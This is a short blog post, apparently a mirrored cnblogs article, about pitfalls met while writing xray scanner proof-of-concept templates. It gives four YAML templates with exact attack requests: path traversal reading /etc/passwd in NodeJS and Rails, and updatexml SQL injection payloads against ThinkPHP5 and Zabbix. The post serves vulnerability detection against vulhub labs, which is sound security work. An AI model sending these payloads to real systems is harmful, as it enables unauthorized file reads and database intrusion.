zoukankan html css js c++ java

xray写POC踩坑

错误记录

静态文件目录不一定是static。
只考虑了linux的情况，如果是 windows 呢，能读取某些应用自己的源码吗。
实际环境参数不一定是id，thinkphp 不适合使用 poc 来写
poc 内容没啥问题，文件名和 poc name有问题 https://travis-ci.org/chaitin/xray/builds/583451463?utm_source=github_status&utm_medium=notification

NodeJS_path-validation_CVE-2017-14849.yml


name: NodeJS_path-validation_CVE-2017-14849
rules:
  - method: GET
    path: /static/../../../a/../../../../etc/passwd
    headers:
      Accept: ''
    follow_redirects: false
    expression: |
      status==200 && body.bcontains(b'root:x:0:0')
detail:
  author: 17bdw
  Affected Version: "NodeJS 8.5.0"
  links:
    - https://github.com/vulhub/vulhub/tree/master/node/CVE-2017-14849

Rails_file_content_disclosure_CVE-2019-5418

name: Rails_file_content_disclosure_CVE-2019-5418
rules:
  - method: GET
    path: /robots
    headers:
      Accept: '../../../../../../../../etc/passwd{{'
    follow_redirects: false
    expression: |
      status==200 && body.bcontains(b'root:x:0:0')
detail:
  author: 17bdw
  Affected Version: "Rails_<6.0.0.beta3, 5.2.2.1, 5.1.6.2, 5.0.7.2, 4.2.11.1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/rails/CVE-2019-5418

thinkphp5-in-sqlinjection

name: thinkphp5-in-sqlinjection
rules:
  - method: GET
    path: /index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "thinkphp5-in-sqlinjection"
  vuln_url: "/index.php?ids[0,updatexml(0,concat(0xa,MD5(8888)),0)]=1"
  links:
    - https://github.com/vulhub/vulhub/tree/master/thinkphp/in-sqlinjection

zabbix_3.0.3_jsrpc.php_CVE-2016-10134

  
name: zabbix_3.0.3_jsrpc.php_CVE-2016-10134
rules:
  - method: GET
    path: /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,MD5(8888)),0)
    expression: |
      body.bcontains(b'cf79ae6addba60ad018347359bd144d')
detail:
  author: 17bdw
  Affected Version: "zabbix_3.0.3_jsrpc.php_CVE-2016-10134"
  vuln_url: "/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)"
  links:
    - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134

查看全文

相关阅读:
27 Spring Cloud Feign整合Hystrix实现容错处理
 26 Spring Cloud使用Hystrix实现容错处理
 25 Spring Cloud Hystrix缓存与合并请求
 24 Spring Cloud Hystrix资源隔离策略（线程、信号量）
23 Spring Cloud Hystrix（熔断器）介绍及使用
 22 Spring Cloud Feign的自定义配置及使用
 21 Spring Cloud使用Feign调用服务接口
 20 Spring Cloud Ribbon配置详解
 19 Spring Cloud Ribbon自定义负载均衡策略
 18 Spring Cloud Ribbon负载均衡策略介绍

原文地址：https://www.cnblogs.com/17bdw/p/11515741.html